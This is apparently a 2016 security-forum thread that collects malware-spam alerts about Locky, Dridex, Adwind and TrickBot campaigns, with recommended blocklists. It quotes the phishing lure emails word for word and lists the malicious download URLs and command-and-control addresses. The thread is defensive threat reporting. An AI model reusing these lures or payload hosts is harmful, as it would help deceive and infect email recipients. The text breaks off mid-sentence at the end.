Fake 'Document' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-document-from-leads-to.html
5 Oct 2016 - "I have only received a single sample of this spam, presumably it comes from random senders. There is no-body-text in my sample.
Subject: Document from Paige
From: Paige cuddie (Paige592035@ gmail .com)
Date: Wednesday, 5 October 2016, 9:37

In this case there was an attached file DOC-20161005-WA0002793.zip containing a malicious script... DOC-20161005-WA0002715.wsf. Automated analysis [1] [2] shows this sample downloads from:
euple .com/65rfgb?EfTazSrkG=eLKWKtL
There will be many other locations besides this. Those same reports show the malware (in this case Locky ransomware) phoning home to:
88.214.236.36 /apache_handler.php (Overoptic Systems, UK / Russia)
109.248.59.100 /apache_handler.php (Ildar Gilmutdinov aka argotel.ru, Russia)
The sample I found downloaded a legitimate binary from ciscobinary.openh264 .org/openh264-win32-v1.3.zip presumably as an anti-analysis technique.
Recommended blocklist:
88.214.236.0/23
109.248.59.0/24 "
1] https://malwr.com/analysis/MDdlZDI1NTkxZDllNDFkY2I5NDNhYmZkYjY3YzEyMWU/
Hosts
23.88.37.83
88.214.236.36

2] https://www.hybrid-analysis.com/sam...c6f9020a96d9eeaad9786382bb1?environmentId=100
Contacted Hosts
23.88.37.83
88.214.236.36
109.248.59.100
52.32.150.180
52.85.184.129
52.41.235.21
___

Fake 'complaint letter' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky/
5 Oct 2016 - "... Locky downloaders.. an email with the subject of 'complaint letter' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with complaint_letter_ containing a WSF file... note the misspelled/typo error in the email body, 'King regards'. We have seen that quite frequently... One of the emails looks like:
From: Roxie Davis <Davis.863@ adsl.viettel .vn>
Date: Wed 05/10/2016 10:20
Subject: complaint letter
Attachment: complaint_letter_cb9d039ea.zip
Dear [redacted], client sent a complaint letter regarding the data file you provided.
The letter is attached. Please review his concerns carefully and reply him as soon as possible.
King regards,
Roxie Davis

5 October 2016: complaint_letter_cb9d039ea.zip: complaint letter 4A683AD.wsf
Current Virus total detections 8/53*... Payload Security** shows a download of an encrypted file from
upper-classmen .com/k1hd6 which is transformed by the script to RpKwxNZ92.dll (VirusTotal 8/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/...a0897f99ba421e80e2fa4cad/analysis/1475660416/

** https://www.hybrid-analysis.com/sam...c35a0897f99ba421e80e2fa4cad?environmentId=100
Contacted Hosts
192.138.189.69
109.248.59.100
88.214.236.36
217.12.223.78
109.248.59.164
91.219.31.49

*** https://www.virustotal.com/en/file/...805fa1a727d49115e98e8efc/analysis/1475661773/
___

Fake 'Cancellation request' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/cancellation-request-malspam-delivers-locky/
5 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Cancellation request' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with Cancellation_Form_ containing a .JS file... One of the emails looks like:
From: Katharine Clayton <Clayton.892@ myfghinc .com>
Date: Wed 05/10/2016 19:40
Subject: Cancellation request
Attachment: Cancellation_Form_3805419.zip
Dear [redacted], to cancel the request you made on October 4th, you need to fill out the cancellation form attached in this email.
Contact us if you need further assistance.
Best regards,
Katharine Clayton
Clients Support

5 October 2016: Cancellation_Form_3805419.zip: Extracts to: Cancellation Form 4FDE6.js
Current Virus total detections 9/54*. MALWR** shows a download of an encrypted file from
http ://noisecontrols .com/dctpl4c which is transformed by the script to CSWzQT0oHGGp27m.dll
(VirusTotal 11/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...e63a5d3bffe22bb4916105b7/analysis/1475693156/

** https://malwr.com/analysis/MGQwNDU3ZjU3YjYxNDNjYmFiNzkyY2FkODY5MWI3MjQ/
Hosts
101.100.175.250

*** https://www.virustotal.com/en/file/...4d3e20ef0616909f4ac8bbcc/analysis/1475694004/

:fear::fear: :mad:
 
Last edited:
Fake 'Your Order', 'Invoice' SPAM

FYI...

Fake 'Your Order' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/your-order-malspam-delivers-locky/
6 Oct 2016 - "... Locky downloader.. an email with the subject of 'Your Order' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting order_details_ containing a .JS file... One of the emails looks like:
From: Hilario Walton <Walton.571@ afirstclassmove .com>
Date: Thu 01/09/2016 19:22
Subject: Travel expense sheet
Attachment: order_details_bfa256b5.zip
Your order has been proceeded. Attached is the invoice for your order A-1376657.
Kindly keep the slip in case you would like to return or state your product’s warranty.

6 October 2016: order_details_bfa256b5.zip: Extracts to: Cancellation Form 0D582E2.js
Current Virus total detections 7/54*. MALWR** shows a download of an encrypted file from
http ://pioneerschina .com/xwks4 which is transformed by the script to Prxa55gCpc.dll (VirusTotal 12/56***)
C2 http ://217.12.223.78 /apache_handler.php... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...408b86c7868bd9d44d470f41/analysis/1475741537/

** https://malwr.com/analysis/N2JhMWQ4...zdkOWI/share/42698fd693c448d5bb86ec016cdab8ad
Hosts
69.195.71.128
217.12.223.78

*** https://www.virustotal.com/en/file/...62b2b5f418cef59809f6f404/analysis/1475742167/

- http://blog.dynamoo.com/2016/10/malware-spam-your-order-and-inevitable.html
6 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
From: Adrian Salinas
Date: 6 October 2016 at 10:13
Subject: Your Order
Your order has been proceeded. Attached is the invoice for your order A-6166964.
Kindly keep the slip in case you would like to return or state your product's warranty.

Details will change from email to email. Attached is a ZIP file with a name similar to order_details_cb9782b.zip containing a malicious obfuscated javascript file named similarly to Cancellation Form 6328B32E.js
According to my source, these various scripts then download a component...
(Many domain-names listed at the dynamoo URL above.)
The malware then phones home to the following IPs (belonging pretty much to the usual suspects):
46.8.44.105 /apache_handler.php (Netart Group / Zomro, Ukraine)
91.219.28.76 /apache_handler.php (FLP Kochenov Aleksej Vladislavovich aka uadomen.com, Ukraine)
188.120.236.21 /apache_handler.php (TheFirst-RU, Russia)
217.12.223.78 /apache_handler.php (ITL, Ukraine)
46.183.221.134 /apache_handler.php (Dataclub, Latvia) ...
Recommended blocklist:
46.8.44.105
46.183.221.128/25
91.219.28.76
188.120.236.21
217.12.223.78 "
___

Fake 'Invoice' SPAM - .doc attachment leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-invoice-123456-12345678.html
6 Oct 2016 - "This -fake- financial spam leads to malware:
From: invoices@ [redacted] .com
Date: 6 October 2016 at 07:16
Subject: Invoice-365961-42888419-888-DE0628DA
Dear Customer,
Please find attached Invoice 42888419 for your attention.
Should you have any Invoice related queries please do not hesitate to contact either your designated Credit Controller or the Main Credit Dept. on 01635 279370.
For Pricing or other general enquiries please contact your local Sales Team.
Yours Faithfully,
Credit Dept'
### This mail has been sent from an un-monitored mailbox ###

The name of the sender and reference numbers will change from email to email. Attached is a Word document with a name in a format similar to 20161006_42888419_Invoice.doc... The sample I sent for automated analysis [1] [2] downloads some data from:
eaglemouth .org/d5436gh
... my sources (thank you, you know who you are) that there are additional download locations at:
dabihfluky .com/d5436gh
fauseandre .net/d5436gh
This particular variant of Locky ransomware uses black hat hosting for this download location rather than a -hacked- legitimate site. All these domains are hosted on the following IPs:
62.84.69.75 (FiberLink Networks, Lebanon)
85.118.45.12 (Andrexen, France) ...
(Many domain-names listed at the dynamoo URL above.) ...
A DLL is dropped with a detection rate of 13/56*.
UPDATE: I completely forgot to include the C2. D'oh.
109.248.59.164 /apache_handler.php (Netart, Russia)
Recommended blocklist:
62.84.69.75
85.118.45.12
109.248.59.164 "
1] https://malwr.com/analysis/ODUxOTJmODJiOGFiNDQyMmE1YTEyMDcwN2E5ODBmMjU/
Hosts
85.118.45.12

2] https://www.hybrid-analysis.com/sam...8017f756508c752f41e7456db35?environmentId=100
Contacted Hosts
62.84.69.75
109.248.59.164
52.32.150.180
54.192.203.206

* https://virustotal.com/en/file/9a44...ac3bfa92f0a46066ce680d76/analysis/1475744035/

:fear::fear: :mad:
 
Last edited:
Fake 'wrong paychecks' SPAM

FYI...

Fake 'wrong paychecks' SPAM - delivers Locky/Odin
- https://myonlinesecurity.co.uk/wrong-paychecks-malspam-delivers-locky-odin/
7 Oct 2016 - "... Locky downloader.. an email with the subject of 'wrong paychecks' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with paychecks_ containing a .JS file... One of the emails looks like:
From: Guy Bennett <Bennett.75@ janicerich .com>
Date: Thu 06/10/2016 22:17
Subject: wrong paychecks
Attachment: paychecks_43b3b18.zip
Hey [redacted]. They send us the wrong paychecks. Attached is your paycheck arrived to my email by mistake.
Please send mine back too.
Best regards,
Guy Bennett

7 October 2016: ea00paychecks_43b3b18.zip: Extracts to: paychecks exported 5648A20E.js
Current Virus total detections 11/54*. MALWR** shows a download of an encrypted file from
http ://bdfxb .com/jp0zuso which is transformed by the script to YXljL8XPAjn.dll (VirusTotal 10/56***). Payload Security[4] shows multiple C2 and additional download locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...c04cb71ec791b782751d43bb/analysis/1475801339/

** https://malwr.com/analysis/OTNiMTUxMTE2MDk0NDg1MGE4MGE4Nzg0OTJjN2NhMjU/
Hosts
182.92.220.92

*** https://www.virustotal.com/en/file/...ea35245f6719cce82b23966d/analysis/1475820102/

4] https://www.hybrid-analysis.com/sam...d03c04cb71ec791b782751d43bb?environmentId=100
Contacted Hosts
31.210.120.156
185.82.217.98
185.75.46.122
185.154.13.182
95.213.179.232
69.195.129.70

:fear::fear: :mad:
 
Dridex - random subjects with cab files - SPAM

FYI...

Dridex - random subjects with cab files - SPAM
- https://myonlinesecurity.co.uk/dridex-delivered-via-random-subjects-with-cab-files/
11 Oct 2016 - "... an email with a variety of subjects along the lines of 'Form Sydnee I. Hahn' (initial word is either Form/Token/License/Certificate or other similar word followed by a name that matches the name in the body of the email, coming as usual from random companies, names and email addresses with a semi-random named cab file attachment (that matches the subject word) containing a .JS file (cab files are Microsoft specific archives (zip files) that are normally used for windows updates. Almost any unzipping tool will extract them, however windows explorer will natively extract and -autorun- any content inside a cab file if double clicked to open them. This looks like Dridex today, rather than the Locky ransomware...
Update 09.30 UTC: A second run starting with a mix of .cab files and .zip files, possibly because many mail filtering systems including Mail Scanner used on a high proportion of Linux mail servers detects and warns about .cab files by default. Some servers are set to block them automatically. This server is set to warn about potentially dangerous file extensions but not block them (to certain domains only) so I can obtain malware samples to warn/alert and submit to anti-virus companies and help protect everybody. For every cab file that I have received so far, I also got a warning message to my postmaster/admin email address. The sort of subjects we are seeing include:
Form Sydnee I. Hahn
Token Jolie T. Barrett
License Armando H. Bates
Certificate Brittany T. Beach
Archive Linda K. McLaughlin
Papers Sylvia C. Price
Agreement Dieter U. Vinson
Report David W. Rogers
Document Isaac Q. Lucas

One of the emails looks like:
From: HilariSydnee I. Hahn <rtep.springvale@ ljh .com.au>
Date: Tue 11/10/2016 08:03
Subject: Form Sydnee I. Hahn
Attachment: Form.cab
Good morning
Please review your Form.
I’m waiting for your reply
Kindest regards
Sydnee I. Hahn

An alternative body content:
Hi
Here is your Token.
Pls inform me the answer as soon as posible
Regards
Jolie T. Barrett

An alternative body content:
Greetings
Here is your License.
I’m still waiting for your answer
Cain M. Rogers

11 October 2016: Form.cab: Extracts to: 20792.tmp - Current Virus total detections 0/55*
.. MALWR** shows a download from http ://www .mobilemanager .fr/log.khp which gave me 20792.tmp (VirusTotal 6/56***)
Detections are inconclusive but Payload Security[4] indicates that this is most probably Dridex banking Trojan, However that also shows an error in running the file with an unsupported system message. That might mean that there is a fault with the Dridex binary or more likely that the Dridex malware gang have added even more protections to their malware and stopping it running when a sandbox or VM is detected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...db45019e901131826d214e0e/analysis/1476169831/

** https://malwr.com/analysis/YTFmNTQ5MmZhMGI5NDNkNTliNzYwNjdlOTYxZDc3YmE/
Hosts
217.76.132.43

*** https://www.virustotal.com/en/file/...4f152b43b25fd4e8f7f3389c/analysis/1476170061/

4] https://www.hybrid-analysis.com/sam...58adb45019e901131826d214e0e?environmentId=100
Contacted Hosts
217.76.132.43
195.154.163.166
88.213.204.147

:fear::fear: :mad:
 
Fake 'Payment - wire transfer' SPAM

FYI...

Fake 'Payment - wire transfer' SPAM - delivers Java Adwind
- https://myonlinesecurity.co.uk/did-...-to-our-account-malspam-delivers-java-adwind/
12 Oct 2016 - "... daily.. -fake- financial themed emails containing java adwind attachments...
This article[1] from a couple of years ago explains why you should remove it.
If you cannot remove it then it -must- be kept up-to-date[2] .. be extremely careful with what you download or open...
1] https://www.theguardian.com/technology/askjack/2013/feb/08/java-remove-ask-jack-technology
2] https://java.com/en/download/
... The email looks like:
From: Account <order@ coreadmin .eficaz .cl>
Date: Wed 12/10/2016 04:56
Subject: RE: Payment
Attachment: Details.zip
Hi,
Did you authorize any wire transfer to our account?
We have received an amount of USD79,948.12 from your account and we do not know what this fund is for.
We do not have any transaction with your company that we know about. So why making payment to us.
Please see the attached remittance documents and double-check with your bank.
We wait for your comment.
Best Regards,
Leo Lee,
Navkar Corporation Ltd
215 Lumpoo Road, Wadsampraya, Pranakorn
Bangkok, 10200 Thialand ...

12 October 2016: details.jar (119kb) - Current Virus total detections 5/55*. Payload Security**
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...cf28f511c33086d008a419f7/analysis/1476250143/

** https://www.hybrid-analysis.com/sam...776cf28f511c33086d008a419f7?environmentId=100

:fear::fear: :mad:
 
WSF email attachments ...

FYI...

WSF email attachments - latest malware delivery vehicle
- https://www.helpnetsecurity.com/2016/10/13/wsf-attachments-malware-delivery/
Oct 13, 2016 - "Most users have by now learned not to open executable (.EXE), various MS Office, RTF and PDF files delivered via -unsolicited- emails, but malware peddlers are always trying out new ways to trick users, email filters and AV software... According to Symantec*, Windows Script Files (WSFs) are the latest file types to be exploited to deliver malware via email...
> https://www.helpnetsecurity.com/images/posts/WSF_attachments.jpg
Number of blocked emails containing malicious WSF attachments by month "

Surge of email attacks using malicious WSF attachments
* https://www.symantec.com/connect/fr/blogs/surge-email-attacks-using-malicious-wsf-attachments
12 Oct. 2016 - "Symantec has seen a major increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments over the past three months. Ransomware groups in particular have been employing this new tactic. In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files...
Malicious WSF files have been used in a number of recent major spam campaigns spreading Locky. For example, between October 3 and 4, Symantec blocked more than 1.3 million emails bearing the subject line "Travel Itinerary." The emails purported to come from a major airline and came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim's computer...
> Tips on protecting yourself from ransomware
Regularly back up any files stored on your computer. If your computer does become infected with ransomware, your files can be restored once the malware has been removed.
Always keep your security software up to date to protect yourself against any new variants of malware.
Keep your operating system and other software updated. Software updates will frequently include patches for newly discovered security vulnerabilities that could be exploited by attackers.
Delete any suspicious-looking emails you receive, especially if they contain links or attachments.
Be extremely wary of any Microsoft Office email attachment that advises you to enable macros to view its content. Unless you are absolutely sure that this is a genuine email from a trusted source, do not enable macros and instead immediately delete the email."

:fear::fear: :mad:
 
Fake 'Final payment' SPAM

FYI...

Fake 'Final payment' SPAM - delivers malware
- https://myonlinesecurity.co.uk/final-payment-request-pretending-to-come-from-hmrc-delivers-malware/
17 Oct 2016 - "An email with the subject of 'Final payment request' pretending to come from angela.fynan@ hmrc.gsi .gov.uk <info@ websitesage60 .us> with a malicious word doc attachment is another one from the current bot runs... I do not know exactly what malware this downloads... The website that the macro inside the malicious word doc connects to is not owned or controlled by HMRC or any other part of the UK government and has been registered to be used as a malware/fraud site http ://hmrc.gsigov .co.uk using false details:
- http://whois.domaintools.com/gsigov.co.uk .. on IP 185.81.113.102 ...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/Final-payment-request_hmrc-1024x771.png

The word doc, which falsely states it was created in an earlier version of word and you 'should enable editing to view it', when opened safely pretends to be a VAT notice and surcharge liability and you need to pay £29,678:
> https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/hmrc_17_oct_2017-1024x800.png

17 October 2016: 18066000010075130101.doc - Current Virus total detections 4/54*. MALWR** shows a download from
http ://hmrc.gsigov .co.uk/vat.exe (VirusTotal 4/56***). Payload Security [1] [2] ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...cd94e7f0d54c87a6d01ec574/analysis/1476717095/

** https://malwr.com/analysis/NmViZmE4MTQ0NjU0NGQ5YjgxYjJkNDUzNDBiZGU2MTg/
Hosts
185.81.113.102: https://www.virustotal.com/en/ip-address/185.81.113.102/information/
> https://www.virustotal.com/en/url/8...d262112aa88280086f712ce25bf1ebb33a8/analysis/

*** https://www.virustotal.com/en/file/...9508d52fa0f87a853079d687/analysis/1476724305/

1] https://www.hybrid-analysis.com/sam...880cd94e7f0d54c87a6d01ec574?environmentId=100
Contacted Hosts
185.81.113.102

2] https://www.hybrid-analysis.com/sam...a3b9508d52fa0f87a853079d687?environmentId=100

:fear::fear: :mad:
 
Last edited:
Fake 'RE: P/O' SPAM

FYI...

Fake 'RE: P/O' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/re-po-malspam-delivers-java-adwind/
19 Oct 2016 - "We continue to be plagued daily by -fake- financial themed emails containing java adwind attachments... The email looks like:
From: Sales <order@ ncima-holding .ci>
Date: Tue 18/10/2016 18:28
Subject: RE: P/O
Attachment: NEW P.O.zip
Attached is the Purchase order list
please confirm so we can proceed.
Thank you.
——————————-
sent from my iPad ...

19 October 2016: New P.O.jar (273kb) - Current Virus total detections 9/56*. Payload Security**...
This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...544a258f48ba66316c0613a7/analysis/1476831444/

** https://www.hybrid-analysis.com/sam...528544a258f48ba66316c0613a7?environmentId=100

:fear::fear: :mad:
 
Fake 'Credit Note', 'FedEx', 'ACH Payment' SPAM

FYI...

Fake 'Credit Note' SPAM - delivers trickbot/dyre banking Trojan
- https://myonlinesecurity.co.uk/cred...alspam-delivers-trickbot-dyre-banking-trojan/
20 Oct 2016 - "... an email with the subject of 'Credit Note CN-81553 from Nordstrom Inc (7907)' pretending to come from Accounts <message-service@ post. xero .com> with a random named/numbered zip attachment containing an .scr file. The icon on this SCR file looks like an adobe PDF icon... One of the emails looks like:
From: Accounts <message-service@ post. xero .com>
Date: Thu 20/10/2016 01:21
Subject: Credit Note CN-81553 from Nordstrom Inc (7907)
Attachment:CN_81274.zip
Hi Orlando,
Attached document is your credit note CN-81553 for 508.18 AUD.
This has been allocated against invoice number.
If you have any questions, please let us know.
Thanks,
Staff Leasing Inc.

20 October 2016: CN_81274.zip: Extracts to: CN-81274.scr - Current Virus total detections 17/57*
.. Payload Security** shows a download/drop of another file RXGp0aqU55eY5AnMxB.exe.exe (VirusTotal 8/57***)
Payload Security[4] .. appears to be dyre/trickloader banking Trojan ... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...98fe1f3ffc88968c7fd2a19a/analysis/1476937031/

** https://www.hybrid-analysis.com/sam...e1398fe1f3ffc88968c7fd2a19a?environmentId=100
Contacted Hosts
185.14.29.13
78.47.139.102
91.219.28.77

*** https://www.virustotal.com/en/file/...8db5134a297e6558281f862d/analysis/1476932944/

4] https://www.hybrid-analysis.com/sam...7938db5134a297e6558281f862d?environmentId=100
Contacted Hosts
78.47.139.102
91.219.28.77
80.79.114.179
___

Fake 'FedEx' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/fake...alspam-emails-continue-to-deliver-ransomware/
20 Oct 2016 - "We are seeing an uptick in the 'FedEx - unable to deliver' malspam emails this week... they are so common and I always get 1 or 2 every day.. today I am receiving quite an increase in numbers over the usual amount... With the holiday season quickly approaching and many more people shopping online, we will see a dramatic increase in these over the next few weeks and months as more people wait for their deliveries... The sort of subjects that you see with this malspam nemucod ransomware campaign which will always have random numbers include:
Delivery Notification, ID 00898050
Shipment delivery problem #0000613766
Problem with parcel shipping, ID:0000857607
Problems with item delivery, n.00000693983
Unable to deliver your item, #0000274397

One of the emails looks like:
From: FedEx Ground <wade.barry@ hosteriasanpatricio .com .ar> or FedEx 2Day A.M. <ruben.morris@ hosteriasanpatricio .com .ar>
Date: Thu 01/09/2016 19:22
Subject: Shipment delivery problem #0000613766 or Delivery Notification, ID 00898050
Attachment: FedEx_ID_0000613766.zip
Dear Customer,
We could not deliver your item.
Please, open email attachment to print shipment label.
Sincerely,
Wade Barry,
Sr. Support Agent.
Or
Dear Customer,
We could not deliver your item.
Shipment Label is attached to email.
Warm regards,
Ruben Morris,
Sr. Operation Manager.

20 October 2016: FedEx_ID_0000613766.zip: Extracts to: FedEx_ID_0000613766.doc.wsf
Current Virus total detections 25/55*: Payload Security** shows downloads of the usual multiple files from
www .industrial-automation .at/counter/?ad=17MGS22ZVQcqSyHw4VU2NvC5SL4eCPhCJb&id=LZUB9RUv-KCRW63gDdZ5mD075Y_vJ1F6feiXr_Sv5Nbbhxr8QKIPLwoOhYdjCOIqaWV65TnMZepmeok-Renqlmw1ioeBLbM8&rnd=01
(with a range from 01–04 that delivers different parts of the malware package)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...264fb5cbe552a48b141e16f6/analysis/1476944618/

** https://www.hybrid-analysis.com/sam...595264fb5cbe552a48b141e16f6?environmentId=100
Contacted Hosts
212.152.181.199
___

Fake 'ACH Payment' SPAM - delivers trickbot/dyre banking Trojan
- https://myonlinesecurity.co.uk/ach-...alspam-delivers-trickbot-dyre-banking-trojan/
20 Oct 2016 - "... an email with the subject of 'ACH Payment Notification' pretending to come from ap_vendor_pay2@ bankofamerica .com with a random named/numbered zip attachment containing an .scr file. The icon on this SCR file looks like an adobe PDF icon... One of the emails looks like:
From: ap_vendor_pay2@ bankofamerica .com
Date: Thu 01/09/2016 19:22
Subject: ACH Payment Notification
Attachment: payment002828870.zip
LOGICEASE SOLUTIONS INC Vendor:10288253 Pay Dt: 20150903
Pay Ref Num: 2000548044
Please download and view payment document attached.
Your invoice has been processed for payment by Bank of America Corporate Accounts Payable. The following items are included in this payment:
The net amount deposited to account number ending XXXX3195
designated by you is $1019.93
IMPORTANT: AVAILABILITY OF FUNDS FOR WITHDRAWAL IS SUBJECT TO POSTING BY RECEIVING BANK (USUALLY WITHIN THREE BUSINESS DAYS)
Please do not respond to this e-mail. Should you have questions, please contact the Purchasing, Payment & Reimbursement helpline at 888.550.7486.
This message, and any attachments, is for the intended recipient’s only, may contain information that is privileged, confidential and/or proprietary and subject to important termsr. If you are not the intended recipient, please delete this message.

20 October 2016: payment002828870.zip: Extracts to: paymen1189d2028.scr . Current Virus total detections 8/56*
.. Payload Security** shows this is likely to be Trickbot/Dyre banking Trojan... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...2da9c001307cf11a49fb9672/analysis/1476964410/

** https://www.hybrid-analysis.com/sam...7a92da9c001307cf11a49fb9672?environmentId=100
Contacted Hosts
78.47.139.102
91.219.28.77

:fear::fear: :mad:
 
Last edited:
Fake 'Receipt', 'Complaint letter' SPAM, Trick Bot – malvertising

FYI...

Fake 'Receipt' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-fake-receipt-leads-to.html
24 Oct 2016 - "Locky ransomware activity has been quite minimal recently, but it seems to be back today. For example, spam with a format similar to the following is currently being sent out:
Date: Mon, 24 Oct 2016 16:03:30 +0530
From: christa.hazelgreave@ gmail .com
Subject: Receipt 68-508

Sender name is a randomly-generated Gmail address. Attached is a ZIP file starting with the words "Receipt" matching the subject of the email contained within is a malicious HTA file with a name similar to Receipt 90592-310743.hta. You can see some of the malicious activity in this Hybrid Analysis*...
(List of domain-names at the dynamoo URL above.)
The malware is Locky ransomware phoning home to:
109.234.35.215/linuxsucks .php (McHost.ru, Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy .example .com] [91.200.14.124] (SKS-Lugan / Vhoster, Ukraine)
185.102.136.77/linuxsucks .php [hostname: artkoty.mgn-host.ru] [185.102.136.77] (MGNHOST, Russia)
bwcfinnt .work/linuxsucks .php [208.100.26.234] (Steadfast, US) ...
Recommended blocklist:
109.234.35.0/24
91.200.14.124
185.102.136.77
208.100.26.234 "
* https://www.hybrid-analysis.com/sam...b15270f3bf4a5448d56b07acc03?environmentId=100
Contacted Hosts
96.0.115.240
107.180.23.49
216.239.139.112
120.117.3.119

- https://myonlinesecurity.co.uk/blan...ail-com-delivers-locky-with-a-shit-extension/
24 Oct 2016 - "... Locky downloader.. a blank/empty email with the subject of 'Receipt 00180-6477' (random numbers) pretending to come from random names at gmail .com with a semi-random named zip attachment starting with 'receipt' that matches the subject containing a random numbered wsf file starting with 'receipt'... One of the emails looks like:
From: jennie.winzer@ gmail .com
Date: Mon 24/10/2016 15:05
Subject: Receipt 00180-6477
Attachment: Receipt 00180-6477.zip

Body content: Totally blank/empty

24 October 2016: Receipt 00180-6477.zip: Extracts to: Receipt 83357-830129.wsf
Current Virus total detections 11/55*.. MALWR** shows a download of an encrypted file from
http ://beyondhorizon .net/076wc?EVgYCyg=JQHYinB which is transformed by the script to uYYRbVgee1.dll
(VirusTotal 6/57***). Payload Security[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...8fdd142c912c14737ce04467/analysis/1477318650/

** https://malwr.com/analysis/ZGI2ODk1MjYyNjQ4NDNlZGJkYzE4ZmZlNDhkNzA4Yzc/
Hosts
192.185.96.52

*** https://www.virustotal.com/en/file/...1a42314d6f8c945e86ac5705/analysis/1477325610/

4] https://www.hybrid-analysis.com/sam...adf8fdd142c912c14737ce04467?environmentId=100
Contacted Hosts
192.185.96.52
185.102.136.77
91.200.14.124
109.234.35.215
69.195.129.70
208.100.26.234
___

Fake 'Complaint letter' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-complaint-letter-leads-to.html
24 Oct 2016 - "This spam leads to Locky ransomware:
From "Justine Hodge"
Date Mon, 24 Oct 2016 19:27:53 +0600
Subject Complaint letter
Dear [redacted],
Client sent a complaint letter regarding the data file you provided.
The letter is attached.
Please review his concerns carefully and reply him as soon as possible.
Best regards,
Justine Hodge

The name of the sender varies. Attached is a ZIP file with a name similar to saved_letter_e154ddcc.zip containing a malicious .JS script with a name starting with "saved letter"... scripts download...
(Long list of domain-names at the dynamoo URL above.)
The malware phones home to the following URLs:
109.234.35.215/linuxsucks .php (McHost .ru, Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy.example .com] [91.200.14.124] (SKS-Lugan / Vhoster, Ukraine)
185.102.136.77/linuxsucks .php [hostname: artkoty.mgn-host .ru] [185.102.136.77] (MGNHOST, Russia)
81.177.22.221/linuxsucks.php (Netplace, Russia)...
... Recommended blocklist:
109.234.35.0/24
91.200.14.124
185.102.136.77
81.177.22.221 "

- https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky-using-a-shit-extension/
24 Oct 2016 - "... Locky downloader.. an email with the subject of 'Complaint letter' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with saved_letter containing a js file... One of the emails looks like:
From: Mia Dickerson <Dickerson.0865@ pipelinemedia .com.au>
Date: Mon 24/10/2016 12:58
Subject: Complaint letter
Attachment: saved_letter_9ff72a60.zip
Dear [redacted], Client sent a complaint letter regarding the data file you provided. The letter is attached. Please review his concerns carefully and reply him as soon as possible. Best regards, Mia Dickerson

24 October 2016: saved_letter_9ff72a60.zip: Extracts to: saved letter 9A2B8.js
Current Virus total detections 11/55*.. MALWR* shows a download of an encrypted file from
http ://gruffcrimp .com/352gr0 which is transformed by the script to RuBjy2wiCxyLGr.dll (VirusTotal 9/57***).
Payload security[4] shows the download from
adultmagstore .com/itc0h81 and the c2 from load of different servers -all- using /linuxsucks .php...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...3a2a56648c98da97e9b6e1aa/analysis/1477310600/

** https://malwr.com/analysis/NTZkNDY3NGEzYjJhNDMzN2EyZmEyYzRiM2U1NTNiNmU/
Hosts
67.171.65.64

*** https://www.virustotal.com/en/file/...9a2acda71a1faa931bf16283/analysis/1477329868/

4] https://www.hybrid-analysis.com/sam...1523a2a56648c98da97e9b6e1aa?environmentId=100
Contacted Hosts
66.154.71.36
81.177.22.221
185.102.136.77
91.200.14.124
109.234.35.215
69.195.129.70
___

Trick Bot – spread via malvertising ...
- https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/
Oct 24, 2016 - "... payload was spread via a malvertising campaign, involving Rig Exploit Kit:
> https://blog.malwarebytes.com/wp-content/uploads/2016/10/malvertising_chain.png
... After being deployed, Trick Bot copy itself into %APPDATA% and deletes the original sample... Trick Bot is composed of several layers. As usually, the first layer is used for the protection – it carries the encrypted payload and tries to hide it from AV software:
> https://blog.malwarebytes.com/wp-content/uploads/2016/10/schema-1.png
... Below we can see it’s decrypted form revealing the attacked online-banking systems:
